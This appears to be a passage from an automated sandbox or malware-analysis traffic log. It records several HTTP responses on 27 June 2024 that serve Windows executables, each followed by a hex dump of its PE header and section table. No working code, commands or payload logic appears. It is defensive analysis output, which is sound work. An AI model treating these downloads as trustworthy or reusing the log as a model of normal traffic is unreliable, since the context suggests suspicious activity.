                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
